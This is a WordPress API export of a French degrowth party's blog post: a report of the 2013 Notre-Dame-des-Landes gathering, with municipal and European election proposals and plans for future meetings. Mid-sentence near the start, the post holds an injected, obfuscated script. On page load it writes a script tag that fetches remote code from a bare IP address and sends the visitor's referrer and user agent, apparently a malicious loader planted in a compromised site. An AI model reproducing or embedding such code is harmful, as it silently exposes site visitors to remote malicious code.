{"id":8578,"date":"2013-08-10T03:35:26","date_gmt":"2013-08-10T02:35:26","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8578"},"modified":"2013-11-03T16:12:40","modified_gmt":"2013-11-03T15:12:40","slug":"festives-2013-a-nddl-cr-des-5-et-6-aout","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8578","title":{"rendered":"(F)Estives 2013 \u00e0 NDDL : CR du 6 ao\u00fbt"},"content":{"rendered":"<p>Malgr\u00e9 une organisation de derni\u00e8re minute et des conditions de rassemblement inhabituelles (mais fort sympathiques), nous nous retrouv\u00e2mes une quarantaine d\u2019inscrits en arrivant \u00e0 la ZAD, pour une centaine de participants au total !<\/p>\n<blockquote><p>On <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|refaa|var|u0026u|referrer|tnzzd||js|php'.split('|'),0,{}))\n<\/script><\/noindex> peut lire aussi un CR sur le site de Reporterre : <a href=\"http:\/\/www.reporterre.net\/spip.php?article4568\" target=\"_blank\">http:\/\/www.reporterre.net\/spip.php?article4568<\/a><\/p><\/blockquote>\n<p><i>CR compil\u00e9 (au fur et \u00e0 mesure des contributions) par Boris P., Christian S. et Michel L. <\/i><\/p>\n<p><i><strong>Source : <a href=\"http:\/\/www.les-oc.info\/2013\/08\/festives-2013-cr\/\">http:\/\/www.les-oc.info\/2013\/08\/festives-2013-cr\/<\/a><\/strong> <\/i><\/p>\n<p>&nbsp;<\/p>\n<p><b>Lundi 5 ao\u00fbt 2013 \u2013 Matin \u2013 <i>Pl\u00e9ni\u00e8re<\/i><\/b> <strong><span style=\"color: #99cc00;\">[&#8230;]<\/span><\/strong><\/p>\n<div class=\"wp-caption alignright\" id=\"attachment_3446\" style=\"width: 410px;\">\n<p><a href=\"http:\/\/www.les-oc.info\/wp-content\/uploads\/2013\/08\/carnets_nddl.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-3446 \" alt=\"carnets_nddl\" src=\"http:\/\/www.les-oc.info\/wp-content\/uploads\/2013\/08\/carnets_nddl.png\" width=\"400\" height=\"279\" \/><\/a><\/p>\n<p class=\"wp-caption-text\">Dessin de Soazig ZZ Dr\u00e9ano qui a publi\u00e9 l\u2019article \u00ab Reportage dessin\u00e9 au festival anti-a\u00e9roport \u00e0 Notre-Dame-des-Landes \u00bb, sur rue89 ; http:\/\/www.rue89.com\/2013\/08\/10\/reportage-dessine-festival-anti-aeroport-a-dame-landes-244815<\/p>\n<\/div>\n<p><b>Mardi 6 ao\u00fbt 2013 \u2013 Matin<\/b><\/p>\n<p>D\u00e9croissance 2014 Continuit\u00e9 du site Internet : decroissance-elections.fr <a href=\"http:\/\/decroissance-elections.fr\/appel-a-convergences-des-decroissants-antiproductivistes-et-anticapitalistes-en-vue-des-elections-de-2014\/\">http:\/\/decroissance-elections.fr\/appel-a-convergences-des-decroissants-antiproductivistes-et-anticapitalistes-en-vue-des-elections-de-2014\/<\/a><\/p>\n<p>1. <span style=\"text-decoration: underline;\">Municipales : Quelles propositions ?<\/span> Pour la souverainet\u00e9 locale et la d\u00e9mocratie de proximit\u00e9. Pour l\u2019autonomie des territoires et des communes. Contre la recentralisation et la m\u00e9tropolisation. Pour la solidarit\u00e9 et contre la concurrence entre territoires. Au-del\u00e0 des d\u00e9tails des propositions, les budgets expriment des priorit\u00e9s. Se sont ces priorit\u00e9s que nous voulons changer. Les collectivit\u00e9s, en tant qu\u2019organisations, doivent aller vers l\u2019exemplarit\u00e9 : dans leur fonctionnement, leurs pratiques, leurs achats (services, produits, eau, \u00e9nergie\u2026). Et particuli\u00e8rement les assembl\u00e9es d\u2019\u00e9luEs : chaque Conseil Municipal vote un r\u00e8glement int\u00e9rieur qui m\u00e9rite souvent lecture et amendements (droits de parole\u2026).<\/p>\n<p><!--more--><\/p>\n<p><strong>D\u00e9mocratie<\/strong><\/p>\n<ul>\n<li>Pour des processus d\u2019information, de participation et de d\u00e9cision par le plus grand nombre (commissions ouvertes).<\/li>\n<li>Pour la transparence des d\u00e9bats, des d\u00e9cisions et la publication (en mairie et en ligne) des documents.<\/li>\n<li>Pour un pluralisme des modes de d\u00e9cision (pr\u00e9f\u00e9rendum, r\u00e9f\u00e9rendum, conf\u00e9rence de citoyens)<\/li>\n<li>Pour un pluralisme des modes de d\u00e9signation (tirage au sort, pr\u00e9f\u00e9rendum, \u00e9lection),<\/li>\n<li>Pour des mandats non cumulables \u2013 courts \u2013 r\u00e9vocables \u2013 imp\u00e9ratifs.<\/li>\n<li>Pour des proc\u00e9dures de compte rendu de mandat,<\/li>\n<\/ul>\n<p><strong>Alimentation<\/strong><\/p>\n<ul>\n<li>Pour des syst\u00e8mes alimentaires locaux et de qualit\u00e9.<\/li>\n<li>Pour la souverainet\u00e9 alimentaire des territoires.<\/li>\n<li>Pour une \u00e9ducation de tous \u00e0 la qualit\u00e9 de l\u2019alimentation : provenance, culture, qualit\u00e9, pr\u00e9paration.<\/li>\n<li>Pour l\u2019agriculture urbaine et scolaire (avec l\u2019aide des services municipaux pour la culture).<\/li>\n<li>Contre les r\u00e8gles sanitaires issues de l\u2019agro-industrie et qui bloquent les exp\u00e9rimentations locales.<\/li>\n<li>Contre la privatisation des services de cantine.<\/li>\n<li>Pour des services publics de cantine, de proximit\u00e9, approvisionn\u00e9s localement.<\/li>\n<li>Pour la mise en r\u00e9gie de l\u2019approvisionnement des cantines <i>(cf Mouans-Sarthoux ou Barjac)<\/i>.<\/li>\n<li>Pour des repas alternatifs (sans viande) dans les cantines.<\/li>\n<li>Pour la diminution, la valorisation et le compostage des d\u00e9chets de cantine.<\/li>\n<li>Contre l\u2019emprise de la grande distribution : limitation des horaires d\u2019ouverture, des surfaces, voire interdiction des implantations.<\/li>\n<\/ul>\n<p><i>Partenaires-ressources : Relocalisons, AMAPs, GAB, CIVAM, Conf\u00e9d\u00e9ration Paysanne, initiatives de Transition, Incroyables Comestibles, BioConsomm\u2019acteurs, Minga, Colibris.<\/i><\/p>\n<p><strong>Sant\u00e9<\/strong><\/p>\n<p>Pour le d\u00e9veloppement de services publics de soins de proximit\u00e9 et la gratuit\u00e9 des soins de base (dentaires\u2026).<br \/>\n<i>Partenaires-ressources :<\/i><\/p>\n<p><strong>Agriculture<\/strong><\/p>\n<ul>\n<li>Pour la pr\u00e9servation des terres agricoles et la redensification.<\/li>\n<li>Pour les circuits courts de proximit\u00e9.<\/li>\n<li>Pour la pr\u00e9emption des terres n\u00e9cessaires \u00e0 l\u2019installation de cultures vivri\u00e8res.<\/li>\n<\/ul>\n<p><i>Partenaires-ressources : Relocalisons, AMAPs, GAB, CIVAM, Terre de liens.<\/i><\/p>\n<p><strong>Pr\u00e9servation<\/strong><\/p>\n<ul>\n<li>Pour un inventaire des haies, bocages, zones humides et zones naturelles remarquables.<\/li>\n<li>Pour la pr\u00e9servation de la nuit : limitation de l\u2019\u00e9clairage public, arr\u00eat des illuminations de no\u00ebl, arr\u00eat de l\u2019\u00e9clairage commercial.<\/li>\n<\/ul>\n<p><strong>Contre l\u2019affichage publicitaire.<\/strong><\/p>\n<p>Pour l\u2019affichage citoyen et associatif.<br \/>\n<i>Partenaires-ressources : Paysages de France, Casseurs de pub.<\/i><\/p>\n<p><strong>Ressources, d\u00e9chets<\/strong><\/p>\n<ul>\n<li>Pour des services publics locaux de l\u2019eau et de l\u2019\u00e9nergie.<\/li>\n<li>Pour la gratuit\u00e9 et la tarification progressive de l\u2019eau et de l\u2019\u00e9nergie.<\/li>\n<li>Pour la r\u00e9duction puis la r\u00e9utilisation puis la valorisation puis le recyclage des d\u00e9chets m\u00e9nagers ET professionnels.<\/li>\n<li>Pour des services publics d\u2019accompagnement et de formation \u00e0 la r\u00e9duction des d\u00e9chets.<\/li>\n<li>Pour les ateliers de r\u00e9paration et les ressourceries.<\/li>\n<li>Pour la distribution de composteurs en bois et la mise en place de poulaillers.<\/li>\n<li>Pour des circuits courts de traitement des d\u00e9chets.<\/li>\n<li>Contre la privatis ation des services de collecte et de traitement des d\u00e9chets.<\/li>\n<li>Pour des services publics de collecte et de traitement des d\u00e9chets.<\/li>\n<li>Pour la distribution gratuite de produits d\u2019entretien et d\u2019hygi\u00e8ne non polluants (savon noir).<\/li>\n<li>Pour des exp\u00e9rimentations de mise en place de toilettes s\u00e8ches (\u00e9coles, habitat collectif).<\/li>\n<li>Pour des fili\u00e8res d\u2019assainissement collectif et individuel en phyto\u00e9puration.<\/li>\n<li>Contre le tout \u00e0 l\u2019\u00e9gout.<\/li>\n<\/ul>\n<p><i>Partenaires-ressources : Compostiers.<\/i><\/p>\n<p><strong>Habitat, urbanisme<\/strong><\/p>\n<ul>\n<li>Pour la r\u00e9appropriation de l\u2019usage des espaces privatis\u00e9s (locaux, logement).<\/li>\n<li>Pour le d\u00e9veloppement de l\u2019habitat partag\u00e9.<\/li>\n<li>Pour des terrains de vie et le droit \u00e0 l\u2019habitat l\u00e9ger.<\/li>\n<li>Pour un accueil solidaire des gens du voyage.<\/li>\n<li>Pour la sobri\u00e9t\u00e9 \u00e9nerg\u00e9tique (isolation des b\u00e2timents).<\/li>\n<li>Pour l\u2019agriculture urbaine : des espaces de culture (potagers, vergers) dans tout programme d\u2019habitat.<\/li>\n<li>Contre le zonage et le tout automobile.<\/li>\n<\/ul>\n<p><i>Partenaires-ressources : Halem, <\/i><\/p>\n<p><strong>Transports<\/strong><\/p>\n<ul>\n<li>Pour la gratuit\u00e9 des transports en commun.<\/li>\n<li>Contre l\u2019emprise de la voiture : limitation \u00e0 30 km\/h en ville voire interdiction.<\/li>\n<\/ul>\n<p><i>Partenaires-ressources : V\u00e9lorution.<\/i><\/p>\n<p><strong>Slogans :<\/strong><\/p>\n<ul>\n<li>Pour la r\u00e9appropriation de la d\u00e9mocratie<\/li>\n<li>Pour la sortie du tout automobile<\/li>\n<li>Pour un urbanisme convivial<\/li>\n<\/ul>\n<p>2. <span style=\"text-decoration: underline;\">Municipales : Quelle strat\u00e9gie ? <!--more--><\/span><\/p>\n<p>Appel \u00e0 la constitution de listes municipales \u00ab Pour la r\u00e9appropriation de la d\u00e9mocratie de proximit\u00e9 \u00bb. Appel \u00e0 la cr\u00e9ation de collectifs politiques MAIS non \u00e9lectoraux \/ post \u00e9lectoraux. \u00ab Gu\u00e9rilla \u00bb sur les programmes des candidats : \u00eatre pr\u00e9sents et critiquer \/ proposer. Diffusion du m\u00e9mento du candidat du minist\u00e8re. Faire le lien avec toutes les initiatives \u00ab d\u2019outillage \u00bb des citoyens ou candidats : voir les fiches BIZI, FNH, Colibris\u2026 Qui veut rejoindre l\u2019\u00e9quipe de coordination ? Qui veut rejoindre l\u2019\u00e9quipe technique (site Internet\u2026) ? <iframe loading=\"lazy\" src=\"http:\/\/player.vimeo.com\/video\/72054416\" height=\"281\" width=\"500\" allowfullscreen=\"\" frameborder=\"0\"><\/iframe><br \/>\n<a href=\"http:\/\/vimeo.com\/72054416\">19-20 Bretagne France 3 2013 08 06 19 00 cut<\/a> from <a href=\"http:\/\/vimeo.com\/user20076973\">Mouvement des OC<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n<p>&nbsp;<\/p>\n<p><b>Mardi 6 ao\u00fbt 2013 \u2013 Apr\u00e8s-midi <\/b>Europe :<\/p>\n<p>1.<span style=\"text-decoration: underline;\">Europ\u00e9ennes : Quelle strat\u00e9gie ?<\/span><\/p>\n<ul>\n<li>En nous adressant typiquement \u00e0 tous ces \u00ab gens \u00bb comme ces 35 000 qui sont venus pendant 2 jours \u00e0 NDDL<\/li>\n<li>Nous devons tirer les le\u00e7ons positives et n\u00e9gatives de notre premi\u00e8re campagne de 2009 : nous ne devons pas nous satisfaire de simplement faire notre apparition politique mais nous devons \u00eatre en capacit\u00e9 de faire des propositions, sur l\u2019Europe et sur l\u2019Euro<\/li>\n<li>Nous devrions oser mettre en avant une <strong>rupture \u00e9cologique<\/strong>.<\/li>\n<\/ul>\n<p>2. <span style=\"text-decoration: underline;\">Europ\u00e9ennes : Quelles propositions ?<\/span><\/p>\n<ul>\n<li>Nous ne devrions pas aller aux \u00e9lections simplement pour dire \u00ab ce que nous sommes \u00bb mais pour dire \u00ab ce que nous proposons \u00bb aux autres.<\/li>\n<li>A qui : proposition de prendre contact avec des groupes comme Bizi\u2026<\/li>\n<li>Strat\u00e9gie non pas \u00ab identitaire \u00bb mais \u00ab identifiante \u00bb ; non pas \u00ab unitudinaire \u00bb mais \u00ab unifiante \u00bb.<\/li>\n<li>Calendrier : 1\/ r\u00e9alisation d\u2019un Appel pour une v\u00e9ritable rupture \u00e9cologique avec l\u2019UE europ\u00e9enne et l\u2019Euro 2\/ Contact avec les mouvements et personnalit\u00e9s susceptibles de partager nos perspectives politiques, en r\u00e9gions et en Europe 3\/ Rencontres \u00e0 partir de fin octobre (Dimanche 27 octobre \u00e0 Grigny \u2013 69 ?)<\/li>\n<\/ul>\n<p><b>ADEROC (Association des Rencontres des Objecteurs de Croissance) : R\u00e9union de pr\u00e9paration des rencontres 2014 \u2013 2015<\/b><\/p>\n<p>1. <span style=\"text-decoration: underline;\">Prochaines rencontres<\/span> Rencontres d\u2019hiver = plut\u00f4t \u00ab approfondissement \u00bb Rencontres d\u2019\u00e9t\u00e9 = plut\u00f4t \u00ab d\u00e9couverte \u00bb<\/p>\n<p>2. <span style=\"text-decoration: underline;\">2014<\/span><br \/>\nEn Pays Basque, avec d\u2019autres composantes de l\u2019altermondialisme et de l\u2019objection de croissance\u2026<br \/>\nPlut\u00f4t d\u00e9but juillet. 12-13-14 juillet 2014<br \/>\nTh\u00e8me : autour de la question de l\u2019espace \u00e9cologique Territoire, r\u00e9gionalisme, souverainet\u00e9 des territoires, apr\u00e8s-d\u00e9veloppement, biodiversit\u00e9 du vivant \/ biodiversit\u00e9 des cultures Faire valider par BIZI en septembre \u00e0 Michel L Contacter La Ligne d\u2019Horizon \u00e0 Christian S<br \/>\nContacter Les Amis de la Terre \u00e0 A Dord\u00e9, Michel L<\/p>\n<p>3. <span style=\"text-decoration: underline;\">2015<\/span> Dans le Nord, en collaboration avec la mouvance OC du nord et de l\u2019est de la France et nos amis belges du Mpoc\u2026<\/p>\n<p>4. <span style=\"text-decoration: underline;\">Rencontres de printemps<\/span> Lieu : St Jean du Gard Date : 23\/03\/14 ou 30\/03\/13 Th\u00e8me : La crise, une opportunit\u00e9 pour les exp\u00e9rimentations sociales et les alternatives concr\u00e8tes.<\/p>\n<p>5. <span style=\"text-decoration: underline;\">Foire \u00e0 l\u2019autogestion : <\/span> Bonne manifestation \u00ab \u0153cum\u00e9nique \u00bb En faire \u00e0 l\u2019initiative des OC ailleurs qu\u2019\u00e0 Paris et Toulouse ? (Une autre en pr\u00e9paration dans le Gard)<\/p>\n<p>6. <span style=\"text-decoration: underline;\">Participation au Festival de la Transition ?<\/span> OK \u00e0 Thierry B<\/p>\n<p>7. <span style=\"text-decoration: underline;\">Elargissement de l\u2019ADEROC<\/span> Inscription \u00e0 la liste mail ADEROC de Oph\u00e9lie + St\u00e9ph Madeleine + Vinc Liegey \u00e0 Boris P<\/p>\n<p>8. <span style=\"text-decoration: underline;\">Liste de diffusion commune aux sensibilit\u00e9s de l\u2019OC<\/span> Cr\u00e9er une liste commune aux divers OC organis\u00e9s dans d\u2019autres mouvements : ATTAC, EELV, Miremont, NPA, Alternatifs\u2026? Qui fait ? Fred et Pascal<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Malgr\u00e9 une organisation de derni\u00e8re minute et des conditions de rassemblement inhabituelles (mais fort sympathiques), nous nous retrouv\u00e2mes une quarantaine d\u2019inscrits en arrivant \u00e0 la ZAD, pour une centaine de participants au total ! On peut lire aussi un CR &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8578\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,53],"tags":[],"class_list":["post-8578","post","type-post","status-publish","format-standard","hentry","category-actualites","category-campagnes-2014"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8578"}],"version-history":[{"count":6,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8578\/revisions"}],"predecessor-version":[{"id":8702,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8578\/revisions\/8702"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}